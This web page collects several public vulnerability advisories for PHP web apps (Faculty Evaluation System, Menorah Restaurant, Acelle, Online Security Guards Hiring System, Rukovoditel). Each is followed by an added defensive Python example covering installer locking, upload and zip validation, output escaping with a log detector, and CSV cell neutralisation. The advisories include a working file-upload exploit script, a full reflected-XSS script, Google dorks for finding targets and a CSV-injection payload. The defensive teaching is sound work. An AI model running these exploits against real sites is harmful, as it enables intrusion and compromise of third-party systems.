as e:<br />        print("[-] Host is not accessible")<br />        sys.exit()<br />    except requests.exceptions.RequestException as e:<br />        print("[-] Error:", e)<br />        sys.exit()<br /><br />def make_request(url, method, files=None):<br />    if method == 'GET':<br />        response = requests.get(url)<br />    elif method == 'POST':<br />        response = requests.post(url, files=files)<br />    else:<br />        raise ValueError(f'Invalid HTTP method: {method}')<br /><br />    if response.status_code == 200:<br />        print('[+] Request successful')<br />        return response.text<br />    else:<br />        print(f'[-] Error {response.status_code}: {response.text}')<br />        return None<br /><br />def find_file(response_get, filename, find_url):<br />    soup = BeautifulSoup(response_get, 'html.parser')<br /><br />    links = soup.find_all('a')<br />    found_files = []<br /><br />    for link in links:<br />        file_upl = link.get('href')<br />        if file_upl.endswith(filename):<br />            found_files.append(file_upl)<br /><br />    if found_files:<br />        print(' File found:')<br />        for file in found_files:<br />            print('[*] ' + file)<br /><br />        print(' Full URL of your file:')<br />        for file_url in found_files:<br />            print('[*] ' + find_url + file_url)<br />    else:<br />        print('[-] File not found')<br /><br />def main():<br />    args = get_args()<br />    url, payload = get_user_input(args)<br />    url = check_input_url(url)<br />    check_host_availability(url)<br /><br />    post_url = url + "/ajax.php?action=save_user"<br />    get_url = url + "/assets/uploads/"<br />    filename = os.path.basename(payload)<br />    payload_file = [('img', (filename, open(args.payload, 'rb'), 'application/octet-stream'))]<br /><br />    print(" Loading payload file")<br />    make_request(post_url, 'POST', files=payload_file)<br />    print(" Listing the uploads directory")<br />    response_get = make_request(get_url, 'GET')<br />    print(" Finding the downloaded payload file")<br />    find_file(response_get, filename, get_url)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Menorah Restaurant - Restaurant Food Ordering System Reinstall Script Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/menorah-restaurant-restaurant-food-ordering-system/23180351 | <br />| # Dork : "Menorah Restaurant . All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : /install/loading_website/ ( loads the default database, which contains the demo user and password )<br /><br />[+] https://127.0.0.0.1/e-catering.terantrindotama/install/loading_website/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
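<p>Three of the advisories on this page describe the same defect from different angles: the KesionCMS wizard lets a request jump straight to stage <code>?action=s4</code> and set the administrator account, the Menorah Restaurant <code>/install/loading_website/</code> endpoint reloads the default database with its demo credentials after installation, and Inlislite ships with default credentials that the installer never forces the operator to change. The following example was added for this page and is not code from any of those products or from the advisories' author. It is a small installer state machine showing the three controls that close those gaps: server-side step ordering, rejection of default or weak administrator passwords, and a lock file that disables every installer route once setup has finished. The step names and field names follow the KesionCMS form on the page; the <code>admin888</code> default is the value visible in that form; the directory layout, the lock-file name and the password policy are assumptions.</p>

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path


class InstallerError(Exception):
    """Any request the installer refuses: locked, out of order, or weak credentials."""


# Step order of a wizard like the one on the page; s4 collects the administrator account.
STEPS = ("s1", "s2", "s3", "s4", "s5")
# Vendor default visible in the form on the page; a real deny-list would be far longer.
KNOWN_DEFAULT_PASSWORDS = {"admin888"}


def hash_password(password: str, salt: bytes) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000).hex()


class Installer:
    """One installer session. `completed` lives server-side, never in a hidden form field."""

    def __init__(self, app_root) -> None:
        self.root = Path(app_root)
        self.lock = self.root / "install.lock"      # assumed name
        self.config = self.root / "config.json"     # assumed name
        self.completed = []
        self.admin = None

    def handle(self, action: str, form: dict) -> str:
        """Serve one wizard step; `action` comes from the query string, `form` from the POST body."""
        if self.lock.exists():
            # Checked before anything else, so reload/reset endpoints are covered too.
            raise InstallerError("installer disabled: install.lock present")
        if action not in STEPS:
            raise InstallerError(f"unknown step {action!r}")
        expected = list(STEPS[:STEPS.index(action)])
        if self.completed != expected:
            raise InstallerError(f"step {action} out of order (completed: {self.completed})")
        if action == "s4":
            self.admin = self._validate_admin(form)
        elif action == "s5":
            self._finish()
        self.completed.append(action)
        return f"{action} ok"

    def _validate_admin(self, form: dict) -> dict:
        # Field names as used by the administrator form on the page.
        user = form.get("TxtUserName", "").strip()
        pw = form.get("TxtUserPass", "")
        if not user:
            raise InstallerError("administrator name required")
        if pw != form.get("TxtReUserPass", ""):
            raise InstallerError("passwords do not match")
        if len(pw) < 12 or pw.lower() == user.lower() or pw in KNOWN_DEFAULT_PASSWORDS:
            raise InstallerError("password too short, equal to the user name, or a known default")
        salt = os.urandom(16)
        return {"user": user, "salt": salt.hex(), "pw_hash": hash_password(pw, salt)}

    def _finish(self) -> None:
        self.config.write_text(json.dumps({"admin": self.admin}))
        self.lock.write_text("installed")   # written last; its presence disables the wizard


def _outcome(inst: Installer, action: str, form: dict) -> str:
    try:
        inst.handle(action, form)
        return "accepted"
    except InstallerError:
        return "rejected"


def demo() -> dict:
    """Runs the wizard in a temporary directory; all values are constructed for the demo."""
    strong = {"TxtUserName": "admin", "TxtUserPass": "Long-Unique-Passphrase-42",
              "TxtReUserPass": "Long-Unique-Passphrase-42"}
    default = {"TxtUserName": "admin", "TxtUserPass": "admin888", "TxtReUserPass": "admin888"}
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        inst = Installer(tmp)
        results["direct_s4"] = _outcome(inst, "s4", strong)       # jumping straight to s4
        for step in ("s1", "s2", "s3"):
            inst.handle(step, {})
        results["default_pw"] = _outcome(inst, "s4", default)     # vendor default refused
        results["strong_pw"] = _outcome(inst, "s4", strong)
        results["finish"] = _outcome(inst, "s5", {})
        results["after_lock"] = _outcome(Installer(tmp), "s1", {})  # any later request
        results["lock_written"] = (Path(tmp) / "install.lock").exists()
    return results


if __name__ == "__main__":
    print(demo())
```

<p>Deleting the installer directory after setup remains the simplest mitigation for deployed sites; the lock check covers the cases where that step is forgotten or where the reinstall route lives outside <code>/install/</code>. Keeping the step list server-side matters because the KesionCMS form carries the next step in a hidden <code>action</code> field, which is exactly the value a client can rewrite.</p>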
<pre><code>====================================================================================================================================<br />| # Title : Acelle Email Marketing v3.0.15 unrestricted file uploads Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/acelle-email-marketing-web-application/17796082 | <br />| # Dork : ". Acelle Email Marketing Application by acellemail.com" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Unrestricted file upload: malicious files can be uploaded in compressed (zip) format.<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Choose a web site and sign up.<br /><br />[+] Go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates<br /><br />[+] Zip your backdoor and upload it.<br /><br /><br /> <br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
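<p>Two advisories on this page are upload-validation failures: the Faculty Evaluation System script earlier posts an arbitrary file as the <code>img</code> field of <code>ajax.php?action=save_user</code> and then finds it under <code>assets/uploads/</code> with its original name, and Acelle accepts a template archive whose members are extracted unchecked. The example below was added for this page; it is not code from either product or from the advisories' authors. It shows the server-side checks that defeat both: an image upload is accepted only on an extension allow-list, a matching magic-number prefix and the absence of a PHP open tag, and is stored under a random server-chosen name; a template archive is inspected member by member for path traversal, disallowed file types and declared size before anything is extracted. The allow-lists, size limits, helper names and the in-memory sample files and zips are all constructed.</p>

```python
import io
import posixpath
import secrets
import zipfile


class UploadRejected(ValueError):
    """Upload refused by validation; the message carries the reason."""


# Magic bytes per allowed image extension (constructed allow-list, not the product's own).
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Files a site template may legitimately contain; nothing server-executable is listed.
TEMPLATE_EXTENSIONS = {".html", ".htm", ".css", ".png", ".jpg", ".jpeg", ".gif", ".txt"}


def validate_image_upload(client_name: str, data: bytes, max_bytes: int = 2 * 1024 * 1024) -> str:
    """Validate a profile-image upload and return the name the server will store it under.

    The client-supplied name is consulted only for its extension; the stored name is
    random, so the request cannot choose a path or a .php name in the uploads directory.
    """
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    base = posixpath.basename(client_name.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in IMAGE_MAGIC:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not match the claimed image type")
    # A valid GIF/PNG header followed by PHP source is still executed if the web server
    # ever runs files from the uploads directory, so refuse anything with a PHP open tag.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded script detected")
    return f"{secrets.token_hex(16)}.{ext}"


def validate_template_archive(zip_bytes: bytes, max_members: int = 200,
                              max_total_bytes: int = 20 * 1024 * 1024) -> list:
    """Inspect a template zip before extraction; return the member names that may be written."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        raise UploadRejected("not a zip archive") from None
    infos = archive.infolist()
    if len(infos) > max_members:
        raise UploadRejected("too many members")
    members, total = [], 0
    for info in infos:
        name = info.filename
        if name.startswith("/") or "\\" in name or ".." in name.split("/"):
            raise UploadRejected(f"unsafe path {name!r}")     # zip-slip / absolute path
        if name.endswith("/"):
            continue  # directory entry; directories are created on demand at extraction
        if posixpath.splitext(name)[1].lower() not in TEMPLATE_EXTENSIONS:
            raise UploadRejected(f"member type not allowed: {name!r}")
        total += info.file_size        # declared uncompressed size bounds a zip bomb
        if total > max_total_bytes:
            raise UploadRejected("archive expands beyond the size limit")
        members.append(name)
    return members


def build_zip(entries: dict) -> bytes:
    """Build an in-memory zip from {name: bytes}; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo() -> dict:
    def outcome(fn, *args):
        try:
            return ("accepted", fn(*args))
        except UploadRejected as exc:
            return ("rejected", str(exc))

    png = IMAGE_MAGIC["png"] + b"\x00" * 32            # constructed PNG-like blob
    php_sample = b"<?php echo 'constructed sample'; ?>"  # harmless stand-in for a script
    gif_polyglot = b"GIF89a" + php_sample
    return {
        "png_stored_as": outcome(validate_image_upload, "avatar.png", png),
        "php_by_name": outcome(validate_image_upload, "file.php", php_sample),
        "php_renamed_png": outcome(validate_image_upload, "file.png", php_sample),
        "gif_polyglot": outcome(validate_image_upload, "pic.gif", gif_polyglot),
        "clean_template": outcome(validate_template_archive,
                                  build_zip({"index.html": b"<h1>hi</h1>", "css/style.css": b"body{}"})),
        "template_with_php": outcome(validate_template_archive,
                                     build_zip({"index.html": b"", "inc/run.php": php_sample})),
        "template_zip_slip": outcome(validate_template_archive,
                                     build_zip({"../../outside.html": b""})),
    }


if __name__ == "__main__":
    print(demo())
```

<p>Both validators only decide what may be written; the upload directory still needs to be served without script execution (no PHP handler for <code>assets/uploads/</code>) and the upload endpoint itself needs an authentication check, which the Faculty Evaluation System's <code>save_user</code> action lacked entirely.</p>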
<pre><code>#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS <br />#Google Dork : NA<br />#Date: 23-01-2023<br />#Exploit Author : AFFAN AHMED<br />#Vendor Homepage: https://phpgurukul.com<br />#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip<br />#Version: 1.0<br />#Tested on: Windows 11 + XAMPP + PYTHON-3.X<br />#CVE : CVE-2023-0527<br /><br />#NOTE: TO RUN THE PROGRAM FIRST SET UP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT<br /># The code below checks the parameter in both /admin-profile.php and /search.php<br /><br />#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md<br /><br /><br />import requests<br />import re<br />from colorama import Fore<br /><br />print(Fore.YELLOW + "######################################################################" + Fore.RESET)<br />print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)<br />print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)<br />print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)<br />print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)<br />print(Fore.YELLOW + "######################################################################" + Fore.RESET)<br /><br />print()<br />print(Fore.RED + "NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py" + Fore.RESET)<br />print()<br /><br /><br /># NAVIGATING TO ADMIN LOGIN PAGE<br />Website_url = "http://localhost/osghs/admin/login.php"  # CHANGE THE URL ACCORDING TO YOUR SETUP<br />print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)<br />print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)<br />print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)<br /><br />Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}<br /><br />headers = {<br />    'Content-Type': 'application/x-www-form-urlencoded',<br />    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',<br />    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',<br />    'Referer': 'http://localhost/osghs/admin/login.php',<br />    'Accept-Encoding': 'gzip, deflate',<br />    'Accept-Language': 'en-US,en;q=0.9',<br />    'Connection': 'close',<br />    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',<br />    'Sec-Fetch-Site': 'same-origin',<br />    'Sec-Fetch-Mode': 'navigate',<br />    'Sec-Fetch-User': '?1',<br />    'Sec-Fetch-Dest': 'document'<br />}<br /><br /># LOG IN AND LOOK FOR THE document.location REDIRECT THE APP EMITS AFTER A SUCCESSFUL LOGIN<br />response = requests.request("POST", Website_url, headers=headers, data=Admin_login_credentials)<br />if response.status_code == 200:<br />    location = re.findall(r'document.location =\'(.*?)\'', response.text)<br />    if location:<br />        print(Fore.GREEN + "> Login Successful into Admin Account" + Fore.RESET)<br />        print(Fore.GREEN + "> Popup:" + Fore.RESET, location)<br />    else:<br />        print(Fore.GREEN + "> document.location not found" + Fore.RESET)<br />else:<br />    # status_code is an int; convert it before concatenating with the colour reset string<br />    print(Fore.GREEN + "> Error:", str(response.status_code) + Fore.RESET)<br />print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)<br />print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)<br /><br /><br /># NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE<br /># INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER<br />Website_url = "http://localhost/osghs/admin/admin-profile.php"  # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE<br /><br /># FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD<br /># FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""<br />payload = {<br />    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",  # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE<br />    "username": "admin",  # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE<br />    "mobilenumber": "8979555558",<br />    "email": "admin@gmail.com",<br />    "submit": "",<br />}<br /><br /># SENDING THE POST REQUEST<br />response = requests.post(Website_url, headers=headers, data=payload)<br /><br />print(Fore.RED + "----------------------------------------------------------------------" + Fore.RESET)<br /># CHECKING FOR STATUS CODE 200 AND FINDING THE REFLECTED SCRIPT TAG WITH A REGEX<br />if response.status_code == 200:<br />    scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)<br />    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : " + Fore.RESET)<br />    print(Fore.GREEN + ">" + Fore.RESET, scripts)<br /></code></pre>
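<p>The advisory above shows the values of <code>adminname</code> and <code>searchdata</code> being written back into the page without encoding. The following is an added example, not PHPGurukul's code, that places the failing pattern beside its fix (HTML-escaping on output) and adds the check a defender can run over web-server access logs to spot attempts against the <code>searchdata</code> query parameter. The two page templates, the log format and the log lines are constructed for the example; note that <code>adminname</code> travels in a POST body and so is not visible in a standard access log, which is why only the GET parameter is watched there.</p>

```python
"""Output encoding and a log check for the two reflected parameters (added example).

render_unsafe() reproduces the failure mode: a user-controlled value is
concatenated straight into HTML. render_safe() escapes it on output.
suspicious_requests() scans constructed access-log lines for the watched
GET parameter carrying markup. Templates and log lines are assumptions.
"""
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

PROFILE_TEMPLATE = "<h2>Welcome, {name}</h2>"          # assumed markup
SEARCH_TEMPLATE = '<p>Results for "{query}"</p>'       # assumed markup

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_unsafe(template: str, **fields) -> str:
    """The vulnerable pattern: raw values interpolated into HTML."""
    return template.format(**fields)


def render_safe(template: str, **fields) -> str:
    """The fix: escape <, >, &, " and ' so a value is always text, never markup."""
    return template.format(**{k: html.escape(str(v), quote=True) for k, v in fields.items()})


def reflects_markup(rendered: str) -> bool:
    """True when a script tag survived rendering (what the exploit's regex looks for)."""
    return bool(SCRIPT_TAG.search(rendered))


# Constructed Apache/nginx "combined"-style log line pattern (request line and status only).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
WATCHED_GET_PARAMS = {"searchdata"}


def suspicious_requests(log_lines):
    """Return [(client ip, parameter)] for requests whose watched GET parameter carries markup."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
        for param in sorted(WATCHED_GET_PARAMS.intersection(qs)):
            for value in qs[param]:
                # parse_qs already decoded once; a second unquote catches double-encoded input.
                if reflects_markup(unquote_plus(value)):
                    hits.append((m["ip"], param))
    return hits


# Constructed input with the same shape as the advisory's adminname value.
NAME = 'TESTAdmin<script>alert("From-Admin-Name")</script>'

# Constructed access-log lines: one ordinary search, one carrying a URL-encoded script tag.
LOG_LINES = [
    '10.0.0.5 - - [23/Jan/2023:10:00:01 +0000] "GET /osghs/search.php?searchdata=guard&search= HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/Jan/2023:10:00:07 +0000] "GET /osghs/search.php?searchdata=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search= HTTP/1.1" 200 734',
]

if __name__ == "__main__":
    print("unsafe :", render_unsafe(PROFILE_TEMPLATE, name=NAME))
    print("safe   :", render_safe(PROFILE_TEMPLATE, name=NAME))
    print("log hits:", suspicious_requests(LOG_LINES))
```

<p>Escaping belongs at the output point (the template), not at input, because the same stored <code>adminname</code> is rendered in several places and a single input filter is easy to bypass or to forget; the log scan is a detection aid and does not replace the encoding fix.</p>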
<pre><code>Exploit Title: Rukovoditel 3.3.1 - CSV injection<br />Version: 3.3.1<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://www.rukovoditel.net/<br />Software Link: https://www.rukovoditel.net/download.php<br />Date found: 27-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. Log in as a user.<br />Step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ).<br />Step 3. Set Firstname to =calc|a!z|<br />Step 4. If the admin exports customers as a CSV file (http://localhost/index.php?module=items/items&path=1), the CSV injection fires on the admin's computer and opens the calculator.<br /><br />payload: =calc|a!z|<br /><br /></code></pre>
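<p>The export step is where this is fixed: a stored first name cannot be trusted, so every cell has to be neutralised on the way out. The following is an added example, not Rukovoditel's code, of a CSV writer that applies the usual defence (a leading single quote on cells that begin with <code>=</code>, <code>+</code>, <code>-</code>, <code>@</code>, tab or carriage return, plus quoting every cell so separators inside a value cannot change the row). The header and customer rows are constructed; the first row uses the payload from the advisory.</p>

```python
"""Neutralising formula-triggering cells on CSV export (added example).

Spreadsheet clients treat a cell beginning with =, +, -, @, tab or CR as a
formula. The export side prefixes such cells with a single quote (the client
then displays the text literally) and quotes every field so that characters
like | , ; inside a value stay inside their cell.
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return the cell text, prefixed with ' when it would be read as a formula."""
    text = str(value)
    # Leading whitespace does not stop evaluation in every client, so look past it.
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(rows, header) -> str:
    """Write header and rows to a CSV string with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


# Constructed customer records; the first firstname is the advisory's payload.
HEADER = ["firstname", "lastname", "email"]
CUSTOMERS = [
    ["=calc|a!z|", "Doe", "jdoe@example.com"],
    ["Ann", "Smith", "ann@example.com"],
    ["-12", 'O"Neil', "x@example.com"],   # a legitimate leading '-' is also prefixed
    ["\t@SUM(1)", "Tab", "t@example.com"],
]

if __name__ == "__main__":
    print(export_csv(CUSTOMERS, HEADER))
```

<p>The trade-off is that legitimate values starting with <code>-</code> or <code>+</code> (negative numbers, phone numbers) also get the quote prefix; most deployments accept that on an export intended for spreadsheets, or apply the prefix only to text columns.</p>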